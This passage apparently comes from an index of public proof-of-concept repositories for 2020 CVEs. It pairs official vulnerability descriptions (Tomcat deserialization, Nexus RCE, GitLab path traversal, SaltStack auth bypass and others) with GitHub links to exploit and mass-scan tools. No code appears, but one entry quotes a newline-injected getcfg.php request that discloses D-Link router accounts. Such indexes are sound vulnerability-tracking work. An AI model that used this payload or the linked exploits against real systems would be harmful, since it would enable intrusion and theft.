end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.

- [darrenmartyn/CVE-2020-9054](https://github.com/darrenmartyn/CVE-2020-9054)

### CVE-2020-9273 (2020-02-20)

In ProFTPD 1.3.7, it is possible to corrupt the memory pool by interrupting the data transfer channel. This triggers a use-after-free in alloc_pool in pool.c, and possible remote code execution.

- [ptef/CVE-2020-9273](https://github.com/ptef/CVE-2020-9273)

### CVE-2020-9283 (2020-02-20)

golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.

- [brompwnie/CVE-2020-9283](https://github.com/brompwnie/CVE-2020-9283)

### CVE-2020-9289 (2020-06-16)

Use of a hard-coded cryptographic key to encrypt password data in CLI configuration in FortiManager 6.2.3 and below, FortiAnalyzer 6.2.3 and below may allow an attacker with access to the CLI configuration or the CLI backup file to decrypt the sensitive data, via knowledge of the hard-coded key.

- [synacktiv/CVE-2020-9289](https://github.com/synacktiv/CVE-2020-9289)

### CVE-2020-9332 (2020-06-17)

ftusbbus2.sys in FabulaTech USB for Remote Desktop through 2020-02-19 allows privilege escalation via crafted IoCtl code related to a USB HID device.

- [Sentinel-One/CVE-2020-9332](https://github.com/Sentinel-One/CVE-2020-9332)

### CVE-2020-9375 (2020-03-25)

TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allow remote attackers to cause a denial of service via a crafted HTTP header containing an unexpected Referer field.

- [thewhiteh4t/cve-2020-9375](https://github.com/thewhiteh4t/cve-2020-9375)

### CVE-2020-9376 (2020-07-09)

D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

- [renatoalencar/dlink-dir610-exploits](https://github.com/renatoalencar/dlink-dir610-exploits)

### CVE-2020-9380 (2020-03-05)

IPTV Smarters WEB TV PLAYER through 2020-02-22 allows attackers to execute OS commands by uploading a script.

- [migueltarga/CVE-2020-9380](https://github.com/migueltarga/CVE-2020-9380)

### CVE-2020-9442 (2020-02-28)

OpenVPN Connect 3.1.0.361 on Windows has Insecure Permissions for %PROGRAMDATA%\OpenVPN Connect\drivers\tap\amd64\win10, which allows local users to gain privileges by copying a malicious drvstore.dll there.

- [hessandrew/CVE-2020-9442](https://github.com/hessandrew/CVE-2020-9442)

### CVE-2020-9460 (2020-04-14)

Octech Oempro 4.7 through 4.11 allow XSS by an authenticated user. The parameter CampaignName in Campaign.Create is vulnerable.

- [g-rubert/CVE-2020-9460](https://github.com/g-rubert/CVE-2020-9460)

### CVE-2020-9461 (2020-04-14)

Octech Oempro 4.7 through 4.11 allow stored XSS by an authenticated user. The FolderName parameter of the Media.CreateFolder command is vulnerable.

- [g-rubert/CVE-2020-9461](https://github.com/g-rubert/CVE-2020-9461)

### CVE-2020-9470 (2020-03-07)

An issue was discovered in Wing FTP Server 6.2.5 before February 2020. Due to insecure permissions when handling session cookies, a local user may view the contents of the session and session_admin directories, which expose active session cookies within the Wing FTP HTTP interface and administration panel. These cookies may be used to hijack user and administrative sessions, including the ability to execute Lua commands as root within the administration panel.

- [Al1ex/CVE-2020-9470](https://github.com/Al1ex/CVE-2020-9470)

### CVE-2020-9472 (2020-03-16)

Umbraco CMS 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.

- [john-dooe/CVE-2020-9472](https://github.com/john-dooe/CVE-2020-9472)

### CVE-2020-9480 (2020-06-23)

In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).

- [XiaoShaYu617/CVE-2020-9480](https://github.com/XiaoShaYu617/CVE-2020-9480)

### CVE-2020-9483 (2020-06-30)

**Resolved** When H2/MySQL/TiDB is used as Apache SkyWalking storage, metadata queries made through the GraphQL protocol have a SQL injection vulnerability, which allows access to unexpected data. The H2/MySQL/TiDB storage implementations in Apache SkyWalking 6.0.0 to 6.6.0 and 7.0.0 don't use the appropriate way to set SQL parameters.

- [shanika04/apache_skywalking](https://github.com/shanika04/apache_skywalking)
- [Neko-chanQwQ/CVE-2020-9483](https://github.com/Neko-chanQwQ/CVE-2020-9483)

### CVE-2020-9484 (2020-05-20)

When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.

- [threedr3am/tomcat-cluster-session-sync-exp](https://github.com/threedr3am/tomcat-cluster-session-sync-exp)
- [masahiro331/CVE-2020-9484](https://github.com/masahiro331/CVE-2020-9484)
- [seanachao/CVE-2020-9484](https://github.com/seanachao/CVE-2020-9484)
- [IdealDreamLast/CVE-2020-9484](https://github.com/IdealDreamLast/CVE-2020-9484)
- [qerogram/CVE-2020-9484](https://github.com/qerogram/CVE-2020-9484)
- [osamahamad/CVE-2020-9484-Mass-Scan](https://github.com/osamahamad/CVE-2020-9484-Mass-Scan)
- [anjai94/CVE-2020-9484-exploit](https://github.com/anjai94/CVE-2020-9484-exploit)
- [PenTestical/CVE-2020-9484](https://github.com/PenTestical/CVE-2020-9484)
- [DanQMoo/CVE-2020-9484-Scanner](https://github.com/DanQMoo/CVE-2020-9484-Scanner)
- [AssassinUKG/CVE-2020-9484](https://github.com/AssassinUKG/CVE-2020-9484)
- [VICXOR/CVE-2020-9484](https://github.com/VICXOR/CVE-2020-9484)
- [DXY0411/CVE-2020-9484](https://github.com/DXY0411/CVE-2020-9484)
- [RepublicR0K/CVE-2020-9484](https://github.com/RepublicR0K/CVE-2020-9484)
- [ColdFusionX/CVE-2020-9484](https://github.com/ColdFusionX/CVE-2020-9484)
- [d3fudd/CVE-2020-9484_Exploit](https://github.com/d3fudd/CVE-2020-9484_Exploit)
- [0dayCTF/CVE-2020-9484](https://github.com/0dayCTF/CVE-2020-9484)
- [Disturbante/CVE-2020-9484](https://github.com/Disturbante/CVE-2020-9484)
- [savsch/PoC_CVE-2020-9484](https://github.com/savsch/PoC_CVE-2020-9484)

### CVE-2020-9495 (2020-06-19)

Apache Archiva login service before 2.2.5 is vulnerable to LDAP injection. An attacker is able to retrieve user attribute data from the connected LDAP server by providing special values to the login form. With certain characters it is possible to modify the LDAP filter used to query the LDAP users. By measuring the response time for the login request, arbitrary attribute data can be retrieved from LDAP user objects.

- [ggolawski/CVE-2020-9495](https://github.com/ggolawski/CVE-2020-9495)

### CVE-2020-9496 (2020-07-15)

XML-RPC requests are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03.

- [dwisiswant0/CVE-2020-9496](https://github.com/dwisiswant0/CVE-2020-9496)
- [Vulnmachines/apache-ofbiz-CVE-2020-9496](https://github.com/Vulnmachines/apache-ofbiz-CVE-2020-9496)
- [g33xter/CVE-2020-9496](https://github.com/g33xter/CVE-2020-9496)
- [cyber-niz/CVE-2020-9496](https://github.com/cyber-niz/CVE-2020-9496)
- [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc)
- [ambalabanov/CVE-2020-9496](https://github.com/ambalabanov/CVE-2020-9496)
- [s4dbrd/CVE-2020-9496](https://github.com/s4dbrd/CVE-2020-9496)
- [Ly0nt4r/CVE-2020-9496](https://github.com/Ly0nt4r/CVE-2020-9496)

### CVE-2020-9547 (2020-03-02)

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).

- [fairyming/CVE-2020-9547](https://github.com/fairyming/CVE-2020-9547)

### CVE-2020-9548 (2020-03-02)

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).

- [fairyming/CVE-2020-9548](https://github.com/fairyming/CVE-2020-9548)

### CVE-2020-9715 (2020-08-19)

Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have a use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution.

- [lsw29475/CVE-2020-9715](https://github.com/lsw29475/CVE-2020-9715)
- [wonjunchun/CVE-2020-9715](https://github.com/wonjunchun/CVE-2020-9715)

### CVE-2020-9758 (2020-03-09)

An issue was discovered in chat.php in LiveZilla Live Chat 8.0.1.3 (Helpdesk). A blind JavaScript injection lies in the name parameter. Triggering this can fetch the username and passwords of the helpdesk employees in the URI. This leads to a privilege escalation, from unauthenticated to user-level access, leading to full account takeover. The attack fetches multiple credentials because they are stored in the database (stored XSS). This affects the mobile/chat URI via the lgn and psswrd parameters.

- [ari034/CVE-2020-9758](https://github.com/ari034/CVE-2020-9758)

### CVE-2020-9767 (2020-08-14)

A vulnerability related to Dynamic-link Library (“DLL”) loading in the Zoom Sharing Service would allow an attacker who had local access to a machine on which the service was running with elevated privileges to elevate their system privileges as well through use of a malicious DLL. Zoom addressed this issue, which only applies to Windows users, in the 5.0.4 client release.

- [shubham0d/Zoom-dll-hijacking](https://github.com/shubham0d/Zoom-dll-hijacking)

### CVE-2020-9802 (2020-06-09)

A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.

- [khcujw/CVE-2020-9802](https://github.com/khcujw/CVE-2020-9802)

### CVE-2020-9922 (2020-12-08)

A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. Processing a maliciously crafted email may lead to writing arbitrary files.

- [Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922](https://github.com/Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922)

### CVE-2020-9934 (2020-10-16)

An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information.

- [mattshockl/CVE-2020-9934](https://github.com/mattshockl/CVE-2020-9934)

### CVE-2020-9992 (2020-10-16)

This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network.

- [c0ntextomy/c0ntextomy](https://github.com/c0ntextomy/c0ntextomy)

### CVE-2020-10128 (2023-09-05)

SearchBlox product with version before 9.2.1 is vulnerable to stored cross-site scripting at multiple user input parameters. In SearchBlox products multiple parameters are not sanitized/validate properly which allows an attacker to inject malicious JavaScript.

- [InfoSec4Fun/CVE-2020-10128](https://github.com/InfoSec4Fun/CVE-2020-10128)

### CVE-2020-10129 (2023-09-06)

SearchBlox before Version 9.2.1 is vulnerable to privilege escalation: a lower-privileged user is able to access Admin functionality.

- [InfoSec4Fun/CVE-2020-10129](https://github.com/InfoSec4Fun/CVE-2020-10129)

### CVE-2020-10130 (2023-09-06)

SearchBlox before Version 9.1 is vulnerable to business logic bypass where the user is able to create multiple super admin users in the system.

- [InfoSec4Fun/CVE-2020-10130](https://github.com/InfoSec4Fun/CVE-2020-10130)

### CVE-2020-10131 (2023-09-06)

SearchBlox before Version 9.2.1 is vulnerable to CSV macro injection in "Featured Results" parameter.

- [InfoSec4Fun/CVE-2020-10131](https://github.com/InfoSec4Fun/CVE-2020-10131)

### CVE-2020-10132 (2023-09-06)

SearchBlox before Version 9.1 is vulnerable to cross-origin resource sharing misconfiguration.

- [InfoSec4Fun/CVE-2020-10132](https://github.com/InfoSec4Fun/CVE-2020-10132)

### CVE-2020-10135 (2020-05-19)

Legacy pairing and secure-connections pairing authentication in Bluetooth BR/EDR Core Specification v5.2 and earlier may allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. An unauthenticated, adjacent attacker could impersonate a Bluetooth BR/EDR master or slave to pair with a previously paired remote device to successfully complete the authentication procedure without knowing the link key.

- [m4rm0k/CVE-2020-10135-BIAS](https://github.com/m4rm0k/CVE-2020-10135-BIAS)

### CVE-2020-10148 (2020-12-29)

The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.

- [rdoix/CVE-2020-10148-Solarwinds-Orion](https://github.com/rdoix/CVE-2020-10148-Solarwinds-Orion)
- [B1anda0/CVE-2020-10148](https://github.com/B1anda0/CVE-2020-10148)

### CVE-2020-10189 (2020-03-06)

Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.

- [zavke/CVE-2020-10189-ManageEngine](https://github.com/zavke/CVE-2020-10189-ManageEngine)

### CVE-2020-10199 (2020-04-01)

Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).

- [wsfengfan/CVE-2020-10199-10204](https://github.com/wsfengfan/CVE-2020-10199-10204)
- [jas502n/CVE-2020-10199](https://github.com/jas502n/CVE-2020-10199)
- [magicming200/CVE-2020-10199_CVE-2020-10204](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204)
- [zhzyker/CVE-2020-10199_POC-EXP](https://github.com/zhzyker/CVE-2020-10199_POC-EXP)
- [aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199)
- [hugosg97/CVE-2020-10199-Nexus-3.21.01](https://github.com/hugosg97/CVE-2020-10199-Nexus-3.21.01)

### CVE-2020-10204 (2020-04-01)

Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution.

- [zhzyker/CVE-2020-10204](https://github.com/zhzyker/CVE-2020-10204)

### CVE-2020-10238 (2020-03-16)

An issue was discovered in Joomla! before 3.9.16. Various actions in com_templates lack the required ACL checks, leading to various potential attack vectors.

- [HoangKien1020/CVE-2020-10238](https://github.com/HoangKien1020/CVE-2020-10238)

### CVE-2020-10239 (2020-03-16)

An issue was discovered in Joomla! before 3.9.16. Incorrect Access Control in the SQL fieldtype of com_fields allows access for non-superadmin users.

- [HoangKien1020/CVE-2020-10239](https://github.com/HoangKien1020/CVE-2020-10239)

### CVE-2020-10551 (2020-04-09)

QQBrowser before 10.5.3870.400 installs a Windows service TsService.exe. This file is writable by anyone belonging to the NT AUTHORITY\Authenticated Users group, which includes all local and remote users. This can be abused by local attackers to escalate privileges to NT AUTHORITY\SYSTEM by writing a malicious executable to the location of TsService.

- [seqred-s-a/CVE-2020-10551](https://github.com/seqred-s-a/CVE-2020-10551)

### CVE-2020-10558 (2020-03-20)

The driving interface of Tesla Model 3 vehicles in any release before 2020.4.10 allows Denial of Service to occur due to improper process separation, which allows attackers to disable the speedometer, web browser, climate controls, turn signal visual and sounds, navigation, autopilot notifications, along with other miscellaneous functions from the main screen.

- [nullze/CVE-2020-10558](https://github.com/nullze/CVE-2020-10558)
- [AmazingOut/Tesla-CVE-2020-10558](https://github.com/AmazingOut/Tesla-CVE-2020-10558)

### CVE-2020-10560 (2020-03-30)

An issue was discovered in Open Source Social Network (OSSN) through 5.3. A user-controlled file path with a weak cryptographic rand() can be used to read any file with the permissions of the webserver. This can lead to further compromise. The attacker must conduct a brute-force attack against the SiteKey to insert into a crafted URL for components/OssnComments/ossn_com.php and/or libraries/ossn.lib.upgrade.php.

- [alex-seymour/CVE-2020-10560-Key-Recovery](https://github.com/alex-seymour/CVE-2020-10560-Key-Recovery)
- [kevthehermit/CVE-2020-10560](https://github.com/kevthehermit/CVE-2020-10560)

### CVE-2020-10596 (2020-03-17)

OpenCart 3.0.3.2 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section.

- [miguelc49/CVE-2020-10596-2](https://github.com/miguelc49/CVE-2020-10596-2)
- [miguelc49/CVE-2020-10596-1](https://github.com/miguelc49/CVE-2020-10596-1)

### CVE-2020-10663 (2020-04-28)

The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.

- [rails-lts/json_cve_2020_10663](https://github.com/rails-lts/json_cve_2020_10663)

### CVE-2020-10665 (2020-03-18)

Docker Desktop allows local privilege escalation to NT AUTHORITY\SYSTEM because it mishandles the collection of diagnostics with Administrator privileges, leading to arbitrary DACL permissions overwrites and arbitrary file writes. This affects Docker Desktop Enterprise before 2.1.0.9, Docker Desktop for Windows Stable before 2.2.0.4, and Docker Desktop for Windows Edge before 2.2.2.0.

- [spaceraccoon/CVE-2020-10665](https://github.com/spaceraccoon/CVE-2020-10665)

### CVE-2020-10673 (2020-03-18)

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).

- [harry1080/CVE-2020-10673](https://github.com/harry1080/CVE-2020-10673)
- [Al1ex/CVE-2020-10673](https://github.com/Al1ex/CVE-2020-10673)

### CVE-2020-10713 (2020-07-30)

A flaw was found in grub2, prior to version 2.06. An attacker may use the GRUB 2 flaw to hijack and tamper with the GRUB verification process. This flaw also allows the bypass of Secure Boot protections. In order to load an untrusted or modified kernel, an attacker would first need to establish access to the system, such as gaining physical access, obtaining the ability to alter a PXE-boot network, or having remote access to a networked system with root access. With this access, an attacker could then craft a string to cause a buffer overflow by injecting a malicious payload that leads to arbitrary code execution within GRUB. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

- [eclypsium/BootHole](https://github.com/eclypsium/BootHole)

### CVE-2020-10749 (2020-06-03)

A vulnerability was found in all versions of containernetworking/plugins before version 0.8.6, that allows malicious containers in Kubernetes clusters to perform man-in-the-middle (MitM) attacks. A malicious container can exploit this flaw by sending rogue IPv6 router advertisements to the host or other containers, to redirect traffic to the malicious container.

- [knqyf263/CVE-2020-10749](https://github.com/knqyf263/CVE-2020-10749)

### CVE-2020-10757 (2020-06-09)

A flaw was found in the Linux Kernel in versions after 4.5-rc1 in the way mremap handled DAX Huge Pages. This flaw allows a local attacker with access to a DAX enabled storage to escalate their privileges on the system.

- [ShaikUsaf/linux-4.19.72_CVE-2020-10757](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-10757)

### CVE-2020-10759 (2020-09-15)

A PGP signature bypass flaw was found in fwupd (all versions), which could lead to the installation of unsigned firmware. As per upstream, a signature bypass is theoretically possible, but not practical because the Linux Vendor Firmware Service (LVFS) is either not implemented or enabled in versions of fwupd shipped with Red Hat Enterprise Linux 7 and 8. The highest threat from this vulnerability is to confidentiality and integrity.

- [justinsteven/CVE-2020-10759-poc](https://github.com/justinsteven/CVE-2020-10759-poc)

### CVE-2020-10770 (2020-12-15)

A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.

- [ColdFusionX/Keycloak-12.0.1-CVE-2020-10770](https://github.com/ColdFusionX/Keycloak-12.0.1-CVE-2020-10770)

### CVE-2020-10882 (2020-03-25)

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tdpServer service, which listens on UDP port 20002 by default. When parsing the slave_mac parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-9650.

- [lnversed/CVE-2020-10882](https://github.com/lnversed/CVE-2020-10882)

### CVE-2020-10915 (2020-04-22)

This vulnerability allows remote attackers to execute arbitrary code on affected installations of VEEAM One Agent 9.5.4.4587. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HandshakeResult method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-10401.

- [Cinnamon1212/Modified-CVE-2020-10915-MsfModule](https://github.com/Cinnamon1212/Modified-CVE-2020-10915-MsfModule)

### CVE-2020-10963 (2020-03-25)

FrozenNode Laravel-Administrator through 5.0.12 allows unrestricted file upload (and consequently Remote Code Execution) via admin/tips_image/image/file_upload image upload with PHP content within a GIF image that has the .php extension. NOTE: this product is discontinued.

- [scopion/CVE-2020-10963](https://github.com/scopion/CVE-2020-10963)

### CVE-2020-10977 (2020-04-08)

GitLab EE/CE 8.5 to 12.9 is vulnerable to a path traversal when moving an issue between projects.

- [KooroshRZ/CVE-2020-10977](https://github.com/KooroshRZ/CVE-2020-10977)
- [thewhiteh4t/cve-2020-10977](https://github.com/thewhiteh4t/cve-2020-10977)
- [JustMichi/CVE-2020-10977.py](https://github.com/JustMichi/CVE-2020-10977.py)
- [erk3/gitlab-12.9.0-file-read](https://github.com/erk3/gitlab-12.9.0-file-read)
- [possib1e/cve-2020-10977](https://github.com/possib1e/cve-2020-10977)
- [liath/CVE-2020-10977](https://github.com/liath/CVE-2020-10977)
- [lisp3r/cve-2020-10977-read-and-execute](https://github.com/lisp3r/cve-2020-10977-read-and-execute)
- [vandycknick/gitlab-cve-2020-10977](https://github.com/vandycknick/gitlab-cve-2020-10977)

### CVE-2020-11019 (2020-05-29)

In FreeRDP less than or equal to 2.0.0, when running with the logger set to "WLOG_TRACE", a possible application crash could occur due to a read of an invalid array index. Data could be printed as a string to the local terminal. This has been fixed in 2.1.0.

- [Lixterclarixe/CVE-2020-11019](https://github.com/Lixterclarixe/CVE-2020-11019)

### CVE-2020-11022 (2020-04-29)

In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

- [0xAJ2K/CVE-2020-11022-CVE-2020-11023](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023)
- [Snorlyd/https-nj.gov---CVE-2020-11022](https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022)

### CVE-2020-11023 (2020-04-29)

In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing `<option>` elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

- [Snorlyd/https-nj.gov---CVE-2020-11023](https://github.com/Snorlyd/https-nj.gov---CVE-2020-11023)
- [Cybernegro/CVE-2020-11023](https://github.com/Cybernegro/CVE-2020-11023)
- [andreassundstrom/cve-2020-11023-demonstration](https://github.com/andreassundstrom/cve-2020-11023-demonstration)

### CVE-2020-11060 (2020-05-12)

In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6.

- [0xdreadnaught/cve-2020-11060-poc](https://github.com/0xdreadnaught/cve-2020-11060-poc)

### CVE-2020-11076 (2020-05-22)

In Puma (RubyGem) before 4.3.4 and 3.12.5, an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.

- [dentarg/cougar](https://github.com/dentarg/cougar)

### CVE-2020-11107 (2020-04-02)

An issue was discovered in XAMPP before 7.2.29, 7.3.x before 7.3.16, and 7.4.x before 7.4.4 on Windows. An unprivileged user can change a .exe configuration in xampp-contol.ini for all users (including admins) to enable arbitrary command execution.

- [S1lkys/CVE-2020-11107](https://github.com/S1lkys/CVE-2020-11107)
- [andripwn/CVE-2020-11107](https://github.com/andripwn/CVE-2020-11107)

### CVE-2020-11108 (2020-05-11)

The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh.

- [Frichetten/CVE-2020-11108-PoC](https://github.com/Frichetten/CVE-2020-11108-PoC)

### CVE-2020-11110 (2020-07-27)

Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.

- [AVE-Stoik/CVE-2020-11110-Proof-of-Concept](https://github.com/AVE-Stoik/CVE-2020-11110-Proof-of-Concept)

### CVE-2020-11113 (2020-03-31)

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).

- [Al1ex/CVE-2020-11113](https://github.com/Al1ex/CVE-2020-11113)

### CVE-2020-11179 (2021-01-21)

Arbitrary read and write to kernel addresses by temporarily overwriting the ring buffer pointer and creating a race condition in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, and Snapdragon Wearables.

- [sparrow-labz/CVE-2020-11179-Adreno-Qualcomm-GPU](https://github.com/sparrow-labz/CVE-2020-11179-Adreno-Qualcomm-GPU)

### CVE-2020-11444 (2020-04-02)

Sonatype Nexus Repository Manager 3.x up to and including 3.21.2 has Incorrect Access Control.

- [zhzyker/CVE-2020-11444](https://github.com/zhzyker/CVE-2020-11444)
- [CN016/Nexus-Repository-Manager-3-CVE-2020-11444-](https://github.com/CN016/Nexus-Repository-Manager-3-CVE-2020-11444-)

### CVE-2020-11492 (2020-06-05)

An issue was discovered in Docker Desktop through 2.2.0.5 on Windows. If a local attacker sets up their own named pipe prior to starting Docker with the same name, this attacker can intercept a connection attempt from Docker Service (which runs as SYSTEM), and then impersonate their privileges.

- [CrackerCat/CVE-2020-11492](https://github.com/CrackerCat/CVE-2020-11492)

### CVE-2020-11493 (2020-09-04)

In Foxit Reader and PhantomPDF before 10.0.1, and PhantomPDF before 9.7.3, attackers can obtain sensitive information about an uninitialized object because of direct transformation from PDF Object to Stream without concern for a crafted XObject.

- [fengjixuchui/CVE-2020-11493](https://github.com/fengjixuchui/CVE-2020-11493)

### CVE-2020-11519 (2020-06-22)

The SDDisk2k.sys driver of WinMagic SecureDoc v8.5 and earlier allows local users to read or write to physical disc sectors via a `\\.\SecureDocDevice` handle. Exploiting this vulnerability results in privileged code execution.

- [patois/winmagic_sd](https://github.com/patois/winmagic_sd)

### CVE-2020-11539 (2020-04-22)

An issue was discovered on Tata Sonata Smart SF Rush 1.12 devices. It has been identified that the smart band has no pairing (mode 0 Bluetooth LE security level). The data being transmitted over the air is not encrypted. In addition, the data being sent to the smart band doesn't have any authentication or signature verification. Thus, any attacker can control a parameter of the device.

- [the-girl-who-lived/CVE-2020-11539](https://github.com/the-girl-who-lived/CVE-2020-11539)

### CVE-2020-11546 (2020-07-14)

SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.

- [Official-BlackHat13/CVE-2020-11546](https://github.com/Official-BlackHat13/CVE-2020-11546)
- [damit5/CVE-2020-11546](https://github.com/damit5/CVE-2020-11546)

### CVE-2020-11547 (2020-04-04)

PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself (CPU usage, memory, Windows version, and internal statistics) via an HTTP request, as demonstrated by type=probes to login.htm or index.htm.

- [ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure](https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure)

### CVE-2020-11579 (2020-09-03)

An issue was discovered in Chadha PHPKB 9.0 Enterprise Edition. installer/test-connection.php (part of the installation process) allows a remote unauthenticated attacker to disclose local files on hosts running PHP before 7.2.16, or on hosts where the MySQL ALLOW LOCAL DATA INFILE option is enabled.

- [ShielderSec/CVE-2020-11579](https://github.com/ShielderSec/CVE-2020-11579)

### CVE-2020-11650 (2020-04-08)

An issue was discovered in iXsystems FreeNAS (and TrueNAS) 11.2 before 11.2-u8 and 11.3 before 11.3-U1. It allows a denial of service. The login authentication component has no limits on the length of an authentication message or the rate at which such messages are sent.

- [weinull/CVE-2020-11650](https://github.com/weinull/CVE-2020-11650)

### CVE-2020-11651 (2020-04-30)

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

